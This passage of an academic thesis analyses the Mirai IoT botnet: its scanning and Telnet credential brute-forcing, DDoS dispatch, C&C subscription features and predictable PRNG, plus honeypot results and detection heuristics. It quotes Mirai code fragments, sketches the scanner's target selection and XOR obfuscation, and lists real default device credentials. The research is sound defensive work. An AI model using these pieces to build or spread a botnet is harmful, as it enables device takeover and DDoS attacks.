Mirai’s scanning method is rather typical for a worm. It is sub-optimal for quick network saturation, as the method for choosing IP addresses to target is completely randomized. The author does, however, argue in Appendix A.1.3 that the scanning algorithm is much faster than that of competing IoT botnets. This could be due to the fact that the scanning process is multithreaded and the most resource-intensive aspect of the process - loading the binary on the device - is done by the more powerful loader server.

Once Mirai is installed onto a device, it attempts to scan for new hosts to attack. The default configuration allows for 128 simultaneous connections, which are stored as a list of the custom-defined type scanner_connection, as defined in Appendix A.2.2 in Code Listing A.2. Each packet sent by the scanner uses and updates the values in that connection’s struct. Mirai uses the select() interface and its fd_set type [35], which allow it to simultaneously monitor file descriptors for input, output, and exceptions. Most of the Mirai code only monitors input and output, including the scanner. As such, it is important to note that while the process below describes the scanner as sending packets and waiting for responses, in reality Mirai is doing all of these simultaneously and across multiple connections. Also note that variants of Mirai in the wild are likely to scan slightly differently.

3.2.3.1 Connection Algorithm

For each connection, Mirai generates a random destination IP address and usually attempts to probe port 23, which is the Telnet port. Every 10th connection probes port 2323, which is commonly used by IoT devices as an alternate Telnet port. Mirai implements its own IP address generation algorithm, which avoids some reserved address spaces as well as those of Hewlett Packard, General Electric, the US Postal Service, and the Department of Defense.

Figure 3.3. The Mirai Scanning Algorithm

In this first connection attempt, Mirai sends a SYN packet, the first part of the common 3-way handshake, and waits for a SYN-ACK from the device. If such a response is received, Mirai begins the next step of its attack process: determining whether the Telnet port is vulnerable to Mirai, i.e. whether the bot is able to successfully authenticate using username/password pairs from its table of default credentials. See Table B.1 in Appendix B.1 for the whole list. Mirai negotiates a Telnet connection and updates the connection state (see Code Listing A.2 - lines 11-23) in response to the packets from the device. When a username or password is required, the bot sends one of the credentials from the previously stated table. If unsuccessful, the connection loads a new set of credentials, connects to the device once again, and attempts to negotiate the Telnet connection. After unsuccessfully trying 10 username/password combinations, the bot ceases to attack the device and cuts the connection. If, however, the credentials were correct, the results are sent to a server which forwards them to the loader.
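The port choice and the address filter can be sketched in a few lines of C. This is a hedged illustration rather than the released code: the function names are hypothetical, which connection index counts as "every 10th" is an assumption, and the filter lists only well-known reserved ranges. The organization-specific blocks mentioned above are deliberately left out, since their exact prefixes should be taken from the source itself.

```c
#include <stdint.h>

/* Every tenth probe goes to 2323, the rest to 23. */
uint16_t scan_port_for(unsigned int connection_index)
{
    return (connection_index % 10 == 0) ? 2323 : 23;
}

/* Return 1 if an address (host byte order) falls in a range the scanner
 * should skip. The ranges below are an illustrative subset only. */
int is_excluded_ip(uint32_t ip)
{
    uint8_t o1 = (ip >> 24) & 0xff;
    uint8_t o2 = (ip >> 16) & 0xff;

    if (o1 == 0 || o1 == 127) return 1;               /* "this" network, loopback */
    if (o1 == 10) return 1;                           /* private (RFC 1918) */
    if (o1 == 172 && o2 >= 16 && o2 <= 31) return 1;  /* private (RFC 1918) */
    if (o1 == 192 && o2 == 168) return 1;             /* private (RFC 1918) */
    if (o1 >= 224) return 1;                          /* multicast and reserved */
    return 0;
}
```

A generator built on this filter would simply draw random 32-bit values until is_excluded_ip returns 0.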

3.2.3.2 Authentication Attempts

It is worth noting that Mirai obfuscates the authentication combinations it attempts. While the authentication table is hard-coded, it would be difficult for a researcher doing static analysis of the binary to determine which combinations are attempted. The code includes a tool to encode strings using a hard-coded key, 0xdeadbeef by default (see Appendix A.4.1). However, it is extremely likely that an adversary creating their own botnet would change this key, making analysis of the binary slightly more difficult. As seen in Appendix A.4.2, when the table of authentication combinations is created in memory during initialization, the combinations are deobfuscated. Each is assigned a weight specified by the user, which affects how likely it is to be chosen for use in an attack.
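One common way to turn such weights into a selection is to walk a cumulative weight line. The C sketch below shows that general technique; it is not taken from the Mirai source, and the function name pick_weighted, the weight type, and the use of a caller-supplied random value are all assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Map a random value `r` onto an index so that entry i is chosen roughly
 * in proportion to weights[i]. Returns n if all weights are zero. */
size_t pick_weighted(const uint16_t *weights, size_t n, uint32_t r)
{
    uint32_t total = 0;
    for (size_t i = 0; i < n; i++)
        total += weights[i];
    if (total == 0)
        return n;

    uint32_t point = r % total;   /* position on the cumulative weight line */
    for (size_t i = 0; i < n; i++) {
        if (point < weights[i])
            return i;
        point -= weights[i];
    }
    return n; /* not reached when total > 0 */
}
```

With weights of 10, 5, and 1, for example, the first combination would be tried about ten times as often as the third.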

3.2.4 Attacker

As a botnet is used for nefarious purposes, the Mirai bot code includes a large section of code to implement various attacks, all of which are DDoS attacks. The botmaster sends attack commands to the bot using the command and control server, as described below in section 3.3.3. The types of attacks implemented in this code release are found in Appendix B.3. Before receiving an attack command from the command and control server (C&C for short), the bot initializes the attack functionality and places all of the methods into a dictionary that the bot accesses upon receiving a command. The following code for attack initialization can be found in attack.h and attack.c.

Listing 3.2. Attack Initialization

    struct attack_target {
        struct sockaddr_in sock_addr;
        ipv4_t addr;
        uint8_t netmask;
    };

    struct attack_option {
        char *val;
        uint8_t key;
    };

    // Signature shared by every attack implementation
    typedef void (*ATTACK_FUNC) (uint8_t, struct attack_target *, uint8_t,
        struct attack_option *);
    typedef uint8_t ATTACK_VECTOR;

    struct attack_method {
        ATTACK_FUNC func;
        ATTACK_VECTOR vector;
    };

    // Register an attack function under its vector identifier
    static void add_attack(ATTACK_VECTOR vector, ATTACK_FUNC func)
    {
        struct attack_method *method = calloc(1, sizeof (struct attack_method));
        method->vector = vector;
        method->func = func;
        methods = realloc(methods, (methods_len + 1) * sizeof (struct attack_method *));
        methods[methods_len++] = method;
    }

Upon receiving an attack command from the C&C server, the bot parses the command and readies the attack. It is sent the attack vector and is able to query the dictionary for the corresponding function. The bot also creates multiple threads to magnify the attack. Once ready, the attack begins. The bot sends packets to the target according to the flags specified in the command for the duration of the attack. Typically, the contents of the packets are randomized save for certain header information. Usually, this doesn’t matter, as the object of the attack is to overwhelm the destination servers. None of the attack types is unique to Mirai, and thus they will not be discussed in detail.

As in any botnet DDoS attack, it is virtually impossible for a victim to determine the true source of the attack. Of course, the victim can see that the packets are coming from the bots, but the command and control server and the botmaster are one and two hops removed from the attack, respectively, and thus are difficult to identify. Additionally, it can be difficult to distinguish DDoS traffic from benign traffic. Due to the size of Mirai botnets, their DDoS attacks are unusually powerful, even though there isn’t anything particularly special about the attack technique implemented here.
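The lookup from attack vector to function amounts to a search over the registered methods. The following C sketch illustrates the idea with a deliberately simplified handler signature; attack_fn, method_entry, find_attack, and the two demo handlers are hypothetical names, not identifiers from attack.c.

```c
#include <stddef.h>
#include <stdint.h>

typedef void (*attack_fn)(void);   /* simplified handler signature */

struct method_entry {
    uint8_t   vector;              /* numeric attack identifier */
    attack_fn func;                /* handler registered for it */
};

/* Linear search of the registered methods; returns NULL if the vector
 * received from the C&C server is unknown. */
attack_fn find_attack(const struct method_entry *table, size_t len,
                      uint8_t vector)
{
    for (size_t i = 0; i < len; i++) {
        if (table[i].vector == vector)
            return table[i].func;
    }
    return NULL;
}

/* Demo handlers that only record which vector was dispatched. */
int last_called = -1;
void demo_handler_a(void) { last_called = 0; }
void demo_handler_b(void) { last_called = 3; }
```

A bot following this pattern would call find_attack with the vector from the parsed command and, if the result is not NULL, invoke it from each attack thread.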

3.2.5 Constants Table

The bot defines a set of constants that are saved into a table. The entries are stored obfuscated. Unlike traditional good encryption, which attempts to resemble the One Time Pad, this obfuscation XORs every set of 4 bytes of the string with the same key defined in the file. The default key is 0xdeadbeef, though it is likely to be changed by an adversary adopting the code. Methods in the malware de-obfuscate entries, use them, and then re-obfuscate them when finished.
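A repeating-key XOR of this kind can be written in a few lines. The C sketch below follows the description in this section and is not copied from the released source, which may apply the key bytes differently; the function name xor_toggle and the choice to apply the most significant key byte first are assumptions.

```c
#include <stddef.h>
#include <stdint.h>

/* XOR `len` bytes in place with a repeating 32-bit key, most significant
 * key byte first (the byte order is an assumption). Applying the function
 * twice with the same key restores the original data. */
void xor_toggle(uint8_t *data, size_t len, uint32_t key)
{
    for (size_t i = 0; i < len; i++) {
        unsigned int shift = 24 - 8 * (unsigned int)(i % 4);
        data[i] ^= (uint8_t)(key >> shift);
    }
}
```

Because XOR is its own inverse, the same routine serves for both de-obfuscating an entry before use and re-obfuscating it afterwards. It also shows why the scheme is weak: anyone who recovers the key from one binary can decode every entry.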

3.3 Command and Control

The botmaster controls the various bots using a central command and control center, as mentioned briefly above. See Figure 3.4 for a graphical representation of the command and control structure. Mirai’s C&C is written in Go. Go was released in 2009 by developers at Google and is meant to resemble C yet have the advantages of Python [36]. It has built-in support for concurrency, which is advantageous for event-based servers like a botnet command and control server. The Mirai C&C server utilizes the net package for network interfacing [37] and the database/sql package for SQL database management.

3.3.1 Initialization

The initialization of the command and control server begins with the creation of the client list, or list of bots in the botnet. See Appendix A.2.3 for the structure of the client list. Again here, as in the loader, individual bots are referred to as workers. As was discussed earlier, the bots themselves initiate the connection with the C&C, so the C&C waits for incoming connections and adds the bots to the client list once received. Bots communicate with the C&C server via port 23 by default, but it is expected that botmasters may change this value. An admin is then created to allow the botmaster to control the bots in the botnet. A database is also created which contains the list of users and the history of attacks. The database is accessed via the API in the admin. Users communicate with the API using port 101.

Figure 3.4. The Mirai Command and Control Structure

3.3.2 Admin Interface and API

The admin interface implements authentication for the botmaster and allows them to control the size and structure of the botnet, as well as initiate attacks. Interestingly, the prompts are written in a combination of Russian and English, which is in contrast to the Japanese and anime theme that is present throughout the botnet (including the name of the botnet itself). The admin allows the botmaster to create new users, which have limited control of the botnet and are only able to execute attacks. This allows botmasters to monetize their botnet even further, by selling access accounts to other users who want to execute DDoS attacks. This functionality is in line with the recent upward trend of DDoS-for-hire discussed in section 2.2.4. The botmaster has an easy-to-use admin interface to manage not only the botnet, but user accounts as well. These users are saved into a database table and the botmaster can manage the following information about each:

• username

• password

• whether the user is an admin

• last time the user paid

• maximum number of bots per attack

• attack duration limit

• cooldown between attacks

Clearly, the creator of Mirai intended to maximize the profitability of this malware, likely with different subscription packages and pay levels, a trend discussed in [24]. Any subscriber who wants to execute an attack is able to do so via the API. They simply enter an attack command that is parsed and sent to bots.

3.3.3 Attack

The goroutines in attack.go are responsible for parsing the command and building the attack commands to be sent to the bots. Clearly, the command and control server does not directly attack targets; this is handled by the bots and is described in section 3.2.4 above. A user has a variety of DDoS attack options available in Mirai. These options are consolidated in the tables in Appendix B.3.

When an attack command is issued, it is parsed by the server. The user is required to specify an attack as well as a variety of flags, all of which are checked. If the command is correct, the information is added to a buffer to be sent to bots. Before it is sent, however, the server checks the destination IP against a list of protected IPs (effectively a blacklist of targets, although the code calls it a whitelist) and checks whether the attack is within the user’s allowed duration and botnet size. If all is okay, the attack is queued and sent to the bots. The bots are actively listening on a socket for attack commands from the C&C. When a command is sent, the bots parse the attack and initiate it. To multiply the effects of the DDoS attack, the bots multi-thread the attack.
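The checks performed before an attack is queued can be summarized as a prefix match plus two limit comparisons. The sketch below is written in C to match the bot code shown elsewhere in this chapter, even though the C&C server itself is written in Go; all names (ip_in_prefix, user_limits, attack_allowed) are hypothetical and the field layout is an assumption based on the account attributes listed in section 3.3.2.

```c
#include <stdint.h>

/* Return 1 if `ip` lies inside prefix/netmask_bits (host byte order). */
int ip_in_prefix(uint32_t ip, uint32_t prefix, unsigned int netmask_bits)
{
    if (netmask_bits == 0) return 1;
    if (netmask_bits > 32) return 0;
    uint32_t mask = 0xffffffffu << (32 - netmask_bits);
    return (ip & mask) == (prefix & mask);
}

/* Hypothetical per-user limits. */
struct user_limits {
    unsigned int max_bots;      /* maximum number of bots per attack */
    unsigned int max_duration;  /* attack duration limit in seconds */
};

/* An attack is allowed only if the target is not protected and the
 * request stays within the user's limits. */
int attack_allowed(const struct user_limits *u, unsigned int bots,
                   unsigned int duration, int target_protected)
{
    return !target_protected
        && bots <= u->max_bots
        && duration <= u->max_duration;
}
```

In this sketch, target_protected would be computed by testing the destination address against each protected prefix with ip_in_prefix.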

3.4 Mirai’s Pseudorandom Number Generator

Mirai defines its own pseudorandom number generator (PRNG), which is referenced dozens of times in the malware code (see Listing 3.3 below). It is seeded when the bot is instantiated using the computer’s clock and the current process id. The random number generator is a linear-feedback shift register (LFSR), and therefore uses a linear deterministic function to calculate the next value from the previous value (see Figure 3.5 below for an illustration).

Listing 3.3. Mirai’s Pseudo-Random Number Generator

    static uint32_t x, y, z, w;

    void rand_init(void)
    {
        x = time(NULL);
        y = getpid() ^ getppid();
        z = clock();
        w = z ^ y;
    }

    uint32_t rand_next(void) // period 2^96-1
    {
        uint32_t t = x;
        t ^= t << 11;
        t ^= t >> 8;
        x = y; y = z; z = w;
        w ^= w >> 19;
        w ^= t;
        return w;
    }

Figure 3.5. The Mirai Random Number Generator

3.4.1 Randomness Analysis

Statistically random LFSRs have a sufficiently even bit distribution and very long periods. rand_next() has a period of 2^96 - 1, which equals about 7.9 × 10^28. Therefore, it is extremely unlikely that a bot will reuse a value.

The PRNG was analyzed using the Dieharder test suite [38]. The generator was used to build a file of 1 billion unsigned integers, which were input into the tests. The full output can be found in Appendix B.4. In statistics, a p-value shows the statistical significance of a result and shows whether to accept or reject a null hypothesis, which, in this case, is that the pseudo-random number generator is as good as a perfect random number generator. The default threshold to measure statistical significance is 0.05, i.e. generators producing p-values below 0.025 or greater than 0.975 would be marked as weak. In other words, such a p-value indicates a statistically significant difference between the pseudo-random number generator and a perfect random number generator. The test data passed a majority of the tests from the Dieharder test suite and failed only a minority (see Appendix B.4). Therefore, we can safely conclude that the Mirai random number generator is rather good, statistically speaking.

However, this generator is not cryptographically secure. A cryptographic pseudo-random number generator (CPRNG) is a more strictly defined pseudo-random number generator. Every CPRNG is a PRNG but not every PRNG is a CPRNG. To be a CPRNG, the following must be true:

1. The CPRNG must pass the next-bit test. If an adversary is given the first k values generated, there is no polynomial-time algorithm which can generate the (k + 1)th value with a statistically significant probability of success (i.e. better than guessing). [39]

2. The CPRNG must be secure even if all or some of its current state is revealed. If it is revealed, the adversary must not be able to deduce any previous states.
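The next-bit test in the first requirement can be tried directly against rand_next() from Listing 3.3. The following C sketch is illustrative only: xs_state, xs_next, and predict_next are hypothetical names, and xs_next simply repeats the update step of Listing 3.3 on an explicit state so that a prediction can be checked against it.

```c
#include <stdint.h>

/* Explicit copy of the four registers used in Listing 3.3. */
struct xs_state { uint32_t x, y, z, w; };

/* Same update step as rand_next(), applied to a caller-supplied state. */
uint32_t xs_next(struct xs_state *s)
{
    uint32_t t = s->x;
    t ^= t << 11;
    t ^= t >> 8;
    s->x = s->y; s->y = s->z; s->z = s->w;
    s->w ^= s->w >> 19;
    s->w ^= t;
    return s->w;
}

/* Given four consecutive outputs (oldest first), compute the fifth.
 * After four calls the registers x, y, z, w hold exactly those outputs,
 * so no knowledge of the seed is needed. */
uint32_t predict_next(const uint32_t out[4])
{
    uint32_t t = out[0];
    t ^= t << 11;
    t ^= t >> 8;
    return out[3] ^ (out[3] >> 19) ^ t;
}
```

Feeding any four consecutive values from xs_next into predict_next yields the value that the following call returns, which is precisely what the next-bit test forbids.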

The Mirai PRNG fails the first requirement miserably. If an adversary is able to see any four consecutive values generated from iteration t - 3 to t, they may deduce the internal state of the PRNG at iteration t (see Figure 3.5 for a representation of the internal states). Therefore, they will be able to know any number output by the generator at iteration t + m, where m is any integer greater than or equal to 0. In fact, the adversary does not necessarily need to see four consecutive outputs. Because this is a linear system, it will be possible, albeit slightly more difficult, to deduce the state given gaps between known outputs.

The Mirai PRNG also fails the second requirement. Knowing the state at iteration t, the adversary can deduce the outputs at iterations t - 3 to t, as 3 of the registers are shifted, unchanged, each iteration. Further back than that, the adversary can continue working backwards, because the only remaining transformation, in which the value from the x register is bit-shifted and exclusive-or’d with the value from the w register, consists of shift and XOR steps that can be undone. Therefore, we can safely conclude that the Mirai generator is not cryptographically secure.

A researcher attempting to investigate a Mirai botnet may be able to deduce information about it, including which IPs it will attempt to compromise next, if they know the outputs of the PRNG. There is the possibility that the author of Mirai does not understand cryptography and randomness well enough to ensure good randomness. There is also the possibility that they do not care; due to the high number of places in the code where rand_next() is used, it may be unlikely that a researcher could get a good sample of the PRNG output. If the author cared, they could have used one of the myriad open-source cryptographically secure random number generators available.

Chapter 4 | Experimental Setup

As investigated and discussed in Chapter 3, Mirai targets vulnerable devices with insecure authentication on the Telnet port. Variants of Mirai have taken control of countless devices including routers, cameras, and DVRs, thus giving it the label "Internet of Things Botnet". As discussed in the introduction, IoT devices make great malware targets, as they are often insecure, almost always online, and rarely interacted with by humans directly. Mirai is so successful at spreading to new hosts that it has been responsible for some of the largest DDoS attacks ever seen.

The world is increasingly becoming connected in order to make the lives of people easier and more convenient. There are so many devices being added that it is infeasible for humans to directly control them all. Thus, it is becoming common for IoT systems to be controlled by a relatively powerful central hub. This may be a processing device that talks to dozens of sensors on a farm, or it may be a hub that manages the devices in a home. We will assume this model when addressing the Mirai problem. We assume that all traffic in a sub-network will be moderated at some point by this central hub, or, at least, that this central hub has some control over the target device in question. We will also assume that this hub is able to do deep packet inspection on the traffic going to and coming from devices.

4.1 Experimental Setup

While the source code for Mirai was investigated, it was important to be able to investigate Mirai’s sniffing behavior in the wild. Anecdotal investigations by security researchers with honeypots have reported getting attacked by IoT malware every couple of minutes. We wanted to corroborate these results and to be able to investigate these sessions closely in order to fingerprint Mirai and to confirm theories about its behavior.

Raspberry Pi 3s running Kali Linux were used to watch the Telnet port of the router on real networks. All of the Raspberry Pis were placed in State College, Pennsylvania on typical home networks - that is, networks that are often targeted by Mirai. The only modification made to the router was to set up port-forwarding, so that all traffic destined for port 23 was automatically forwarded to the Raspberry Pi. As the Telnet protocol has largely been replaced by SSH for normal usage, and as port 23 is usually closed on these routers, it is generally not intrusive to utilize port-forwarding, and it was not intrusive in any of the cases here.

The Raspberry Pis were configured with a Telnet server, so that a would-be attacker would be able to attempt to authenticate. While the Telnet server will log authentication attempts, it was also useful to log all packets in the session. The dumpcap utility, which is a part of the Wireshark program, was used to log all traffic seen over port 23. The results were saved into pcap files and investigated later. Traffic was collected between April 27th and May 8th, 2017 on five devices.

Chapter 5 | Results and Discussion

5.1 Mirai-Infected Device Behavior

Typically, Internet of Things devices are essentially connected control systems, albeit more complex ones. That is, as opposed to a personal computer, which will initiate connections and execute a variety of functionalities, an IoT device will typically react to some command or stimulus and initiate a state change. For example, a connected thermostat may react to a large temperature drop by turning on the heat. It may also react to a signal from the control app on a user’s phone commanding it to update the temperature.

Figure 5.1. Conventional IoT Device Behavior

Even a router - a common Mirai target - could arguably be considered an IoT device. Typically, a router will not initiate connections. Instead, it will take incoming packets and forward them to devices on the network and will take packets from the network and send them out to the Internet.

A Mirai-infected device, conversely, will not behave in an expected manner. Instead of primarily being a reactionary device, it will be very active, with, likely, the majority of its traffic becoming Mirai traffic. Recall that conventional Mirai bots will have 128 active connections scanning for new vulnerable hosts to infect. Mirai is loud and its scanning traffic is next to impossible to disguise as benign. As a result, it will also increase the device’s bandwidth usage, potentially slowing down connections for other devices on the network.

Figure 5.2. Mirai-Infected IoT Device Behavior

If a Mirai-infected device is found on a network, we could block all traffic going to and coming from the device in order to prevent spread and other damage. While Mirai currently does not execute any attacks besides DDoS and does not explicitly target devices in the local network, it cannot be assumed that future variants will not develop this functionality (as discussed in Chapter 6). Luckily, current variants of Mirai are loaded into memory and are completely erased upon device reset.

5.2 Mirai Traffic Headers

Mirai makes great attempts to appear benign to a target when sending Telnet traffic. Listing 5.1 below contains the code utilized by Mirai to create its packet headers. The created packets are sent using functionality in the popular C socket library. Figures 5.4 and 5.6 show IP and TCP headers created by this code.

Listing 5.1. Packet Header Initialization

    // Set up IPv4 header
    iph->ihl = 5;
    iph->version = 4;
    iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct tcphdr));
    iph->id = rand_next();
    iph->ttl = 64;
    iph->protocol = IPPROTO_TCP;
    iph->saddr = LOCAL_ADDR;
    iph->daddr = get_random_ip();
    iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));

    // Set up TCP header
    tcph->dest = htons(23);
    source_port = rand_next() & 0xffff;
    tcph->source = source_port;
    tcph->doff = 5;
    tcph->window = rand_next() & 0xffff;
    tcph->syn = TRUE;
    tcph->seq = iph->daddr;
    tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr)),
        sizeof (struct tcphdr));

5.2.1 IPv4 Header

Mirai’s IPv4 header is built to appear as normal as possible so as to evade detection. It uses common settings and correctly calculates the header length and checksum. The ID field is randomized, which is common when fragmentation is not occurring. One could potentially look at the IP address to distinguish malicious traffic, perhaps to block all Telnet traffic coming from another country. However, as discussed in Section 5.4, Mirai is so pervasive across the Internet that it won’t be long before a device is targeted by a bot close by geographically. Instead, one could easily white-list IPs so that a firewall will only allow a select few connections to the Telnet port. Otherwise, it is unlikely that an intrusion detection system will be able to differentiate Mirai traffic by looking at the IPv4 header alone.
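The header checksum that Mirai computes correctly is the standard Internet checksum: the one's-complement of the one's-complement sum of the header's 16-bit words. The C sketch below shows that standard algorithm as a standalone function; it is not the checksum_generic routine from Listing 5.1, and the name inet_checksum is hypothetical. It reads the bytes in network order and returns the checksum as a host-order value.

```c
#include <stddef.h>
#include <stdint.h>

/* Internet checksum over `len` bytes, with the checksum field assumed to
 * be zero while computing. Verifying a header that already contains its
 * checksum yields 0. */
uint16_t inet_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;

    while (len > 1) {                       /* add 16-bit big-endian words */
        sum += ((uint32_t)data[0] << 8) | data[1];
        data += 2;
        len -= 2;
    }
    if (len == 1)                           /* pad a trailing odd byte */
        sum += (uint32_t)data[0] << 8;

    while (sum >> 16)                       /* fold carries back in */
        sum = (sum & 0xffff) + (sum >> 16);

    return (uint16_t)~sum;
}
```

An inspection device can run the same computation over a captured header; a result of zero over the full header, checksum included, means the header is internally consistent, which is the case for Mirai's packets.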

Figure 5.3. Benign IPv4 Header [Wireshark]

Figure 5.4. Mirai IPv4 Header [Wireshark]

5.2.2 TCP Header

Mirai also attempts to build the TCP header to appear benign. Typically, when connecting via Telnet, the source port is randomized. Such is the case with Mirai. Mirai builds every other field to resemble benign traffic as well.

Figure 5.5. Benign TCP Header [Wireshark]

Figure 5.6. Mirai TCP Header [Wireshark]

5.3 Mirai Traffic Payload

Mirai traffic diverges from typical benign behavior when it comes to the payload of its traffic. As such, fingerprinting Mirai will require deep packet inspection, which is usually done using an intrusion detection system or an intrusion prevention system. Flagged packets can be blocked and reported so that further action can be taken.

Figure 5.7. Telnet Session

Figure 5.8. Mirai Telnet Session

5.3.1 Telnet Negotiation

When a user connects to a Telnet server, before a login prompt appears, a configuration negotiation takes place. The device and/or the server will send configuration requests to the other, which are either accepted or denied. These configurations - or options as they are sometimes called - can decide the character set, echo mode, network options, and more. Typically, when a user connects using a PC, several requests are automatically sent to the server to make the experience for the user as optimal as possible. Requests go back and forth, some of which are accepted and some of which are denied. Interestingly, in the traffic analyzed, very few instances were found where the device sent requests. The same set of configuration requests, as seen in Figure 5.8, was sent from the server to the device in each case, and all of them were denied. Note that a different server may request different configurations.

5.3.2 Linemode

One major option for a Telnet session is the linemode option. The default setting is to send a packet each time a character is input. For example, if a user were to input the username "root", a packet will typically be sent for "r", "o", "o", "t", and "\n\r". It is possible to reduce the number of packets by setting this linemode option. In that case, most processing and feedback will be done locally and, in our example, the packet sent will likely contain the payload "root\n\r". Mirai does not set the linemode option. Yet, it will send payloads with full usernames and passwords when, if it were a real user, it would send one character at a time. Such a disparity is easy to fingerprint, as the server, the device, and any device listening to the traffic would know the configurations previously agreed upon.
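This disparity can be expressed as a simple per-packet rule. The C sketch below is a heuristic under stated assumptions and not a complete detector: the function name violates_char_mode is hypothetical, the inspecting device is assumed to have tracked whether linemode was negotiated, and the payload length is assumed to exclude Telnet option commands.

```c
#include <stddef.h>

/* Flag a client payload that carries several characters at once even
 * though LINEMODE was never negotiated for the session. */
int violates_char_mode(int linemode_negotiated, size_t payload_len)
{
    /* In character-at-a-time mode a keystroke yields one byte; a line
     * ending may arrive as a two-byte pair, so up to 2 bytes is allowed. */
    return !linemode_negotiated && payload_len > 2;
}
```

A payload such as a complete six-byte username-plus-line-ending in a session without linemode would be flagged, while single keystrokes would not. Pasted input from a real user could trip the same rule, so it is best combined with other indicators.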

5.3.3 Timing

A user connecting to a Telnet server is obviously much slower than a computer. It takes time to type out usernames, passwords, and commands. The average person types 40 words per minute, which equates to about 200 characters per minute, or roughly 3 characters per second. This means it will take a user a second or two, at least, to type out a username, password, or command for the Telnet server. In Mirai’s case, these payloads are sent extremely quickly. In many cases in our analysis, the time delta between receiving a username or password prompt and sending the packet with the requested information is less than 0.2 seconds.
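The timing argument translates into a one-line comparison. The following C sketch uses the typing rate quoted above (200 characters per minute) as its only parameter; the function and macro names are hypothetical, and the rate is an average, so a fast typist or a scripted but benign client could also be flagged.

```c
#include <stddef.h>

/* 40 words per minute, i.e. about 200 characters per minute. */
#define TYPING_CHARS_PER_SECOND (200.0 / 60.0)

/* Return 1 if `n_chars` arrived sooner after the prompt than a typist at
 * the rate above could plausibly have entered them. */
int faster_than_typing(size_t n_chars, double seconds_since_prompt)
{
    double min_human_seconds = (double)n_chars / TYPING_CHARS_PER_SECOND;
    return seconds_since_prompt < min_human_seconds;
}
```

For a five-character username, the threshold works out to 1.5 seconds, so a reply arriving 0.2 seconds after the prompt is flagged while one arriving after 2 seconds is not.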

5.3.4 Credentials Tried

Unless an attacker guesses the correct credentials of the target device within the first few attempts, it quickly becomes obvious that the credentials being tried are drawn from a list similar to the one hardcoded in Mirai, especially if they are extremely device-specific. Because we collected a large amount of malicious traffic, we were able to learn which default credentials are currently being tried in the wild. See Appendix B.2 for a full list. The released version of Mirai contains a set of 60 hardcoded credentials, all of which were seen. However, we also saw many credentials that did not appear in the release. This is unsurprising, as those who adapt Mirai are likely to modify this list. Most of the default credentials seen target routers, DVRs, printers, and cameras. However, due to the widespread use of extremely common username:password combinations, it is likely that other types of IoT devices use credentials already on this list, or that users of Mirai will add more credentials to the attack. It is also interesting to note that a disproportionate share of the insecure devices specifically targeted are Chinese, with combinations like adminlvjh:adminlvjh123, e8ehome:e8ehome, root:nmgx_wapia, and root:hg2x0 all targeting Chinese routers and cameras. What's more, many of these devices are very cheap, and are thus likely to be relatively popular. Unfortunately, it seems that a cheaper device implies weaker security.

5.4 Locations of Infected Devices

Figure 5.9. Attack Source Heat Map

Mirai bots indiscriminately target devices all over the world in virtually all IP ranges. However, not every device is vulnerable to Mirai. We investigated the locations of the devices attacking our Raspberry Pis by looking at their IP addresses. Though one device may attack multiple times in quick succession, we counted each address only once. We then plotted the information on a logarithmic heat map, shown in Figure 5.9. For the most part, the prevalence of Mirai-infected devices loosely follows the population density of developed countries. As can be seen in Table 5.1, the top 3 sources of attacks are China, Russia, and Brazil. According to Security Today, these 3 countries are among the top 5 originators of cyber attacks [40], with the other two - the United States and Turkey - also appearing in Table 5.1. These results are in line with what was seen in section 5.3.4, where we saw that Chinese devices were disproportionately targeted. Many of the other countries appearing in the top 10 are in Asia, pointing to a trend of high use of insecure devices in these places. China is home to one of the world's largest economies - and to the world's largest population. Such a vulnerable cyber-infrastructure is extremely dangerous, with the fallout from an attack affecting countries throughout the world. These devices - wherever they are made - are sold all over the world, so combating the threat of Mirai and similar malware requires global cooperation.

Table 5.1. Top 10 Source Countries

Rank  Country         Number of Devices
1     China           2970
2     Russia          1309
3     Brazil          596
4     South Korea     506
5     United States   474
6     Turkey          444
7     Vietnam         369
8     India           307
9     Taiwan          301
10    Argentina       272
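The counting rule used for these results, in which each source address is counted once no matter how often it attacks, can be sketched as follows. This is an illustration under stated assumptions, not the script used for the thesis: `devices_per_country` is a hypothetical name, the addresses come from the reserved documentation ranges, and the IP-to-country mapping is a plain dictionary standing in for whatever geolocation database is available.

```python
from collections import Counter


def devices_per_country(attack_sources, country_of):
    """Count unique attacking addresses per country.

    attack_sources: iterable of source IP strings, one entry per attack.
    country_of:     dict mapping IP string -> country name (assumed lookup).
    """
    unique_addresses = set(attack_sources)  # repeat attacks collapse to one device
    return Counter(country_of.get(ip, "Unknown") for ip in unique_addresses)


# Hypothetical sample data using documentation-only address ranges.
sample_log = ["192.0.2.1", "192.0.2.1", "192.0.2.1", "198.51.100.7", "203.0.113.9"]
sample_geo = {"192.0.2.1": "China", "198.51.100.7": "China", "203.0.113.9": "Brazil"}
sample_counts = devices_per_country(sample_log, sample_geo)
```

Here `sample_counts` records two devices for China and one for Brazil, even though one Chinese address appears three times in the log. Counting addresses rather than attacks keeps a single aggressive bot from dominating the map, although devices behind NAT or with changing addresses will still be miscounted.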

5.5 Traffic Flows

Many botnets that compromise traditional PCs experience higher traffic volumes during the parts of the day when these PCs are on. In those cases, for example, if a researcher in the United States saw more attack traffic hitting their device in the middle of the night, they could infer that the attacks were largely coming from Asia, where it is the middle of the day. With IoT devices, such inferences are harder to make because the devices are online all the time. Figures 5.10 and 5.11 are IO graphs of Telnet traffic over a 24-hour period on two of our devices. The timeframe observed by both devices is the same. Notice that the level of traffic is relatively consistent over this time period, save for a large peak observed by both devices around 7 PM on April 30th. This could be for a number of reasons, including the possibility that a number of botnets were initiated around this time.
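An IO graph of this kind is essentially a histogram of packet timestamps, so a peak like the one described can also be located programmatically. The sketch below is illustrative only. It assumes timestamps in seconds, and the spike rule (a bucket exceeding three times the median bucket) is an arbitrary choice for the example, not a method used in the thesis.

```python
from collections import Counter
from statistics import median


def packets_per_bucket(timestamps, bucket_seconds=3600):
    """Histogram of packet timestamps (in seconds), keyed by bucket index."""
    return Counter(int(t // bucket_seconds) for t in timestamps)


def spikes(counts, factor=3.0):
    """Bucket indices whose packet count exceeds `factor` times the median."""
    typical = median(counts.values())
    return sorted(b for b, n in counts.items() if n > factor * typical)


# Synthetic day of traffic: 10 packets every hour, except 100 packets in hour 19.
synthetic = [h * 3600 + i for h in range(24) for i in range(100 if h == 19 else 10)]
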